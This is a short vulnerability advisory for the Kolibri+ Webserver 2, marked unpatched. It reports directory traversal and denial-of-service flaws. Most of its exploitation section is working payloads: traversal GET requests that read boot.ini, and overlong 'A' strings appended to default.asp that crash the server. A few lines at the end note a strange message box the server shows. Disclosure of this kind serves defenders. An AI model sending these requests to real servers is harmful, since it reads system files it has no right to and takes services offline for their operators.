Kolibri+ Webserver 2 suffers from directory traversal and denial of service vulnerabilities.
5fa8857290b16df1c4bd5fb00427d8f8d6f2303771a526a8843db0527a272d20
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , DOS/Crash + Directory Traversal Vulnerability
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Date : 06/09/09
# Homepage : http://www.xc0re.net
#
#############################################################################################
[*] Download Page : http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[Directory Traversal]
GET /../../../../../../../../../boot.ini HTTP/1.0
GET /../../../../../../../../boot.ini HTTP/1.0
[DOS / CRASH]
("A" x 200; #Late crash)
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
("A" x 250 or more then 250 Bytes ; #Immediate Termination of process)
This can also be used ! /default.asp["A" x 250]
[Strange Behavior]
"/x/_/c:/boot.ini"
Giving the in the url displays "Not Found" msg on the browser & fires off a meesageBox saying that it cannot find the file specified, on the local GUI ! Although the typical 404 not found message for GET /s HTTP/1.1 is "Not found: /s".And nothing fires off a messagebox in the local GUI.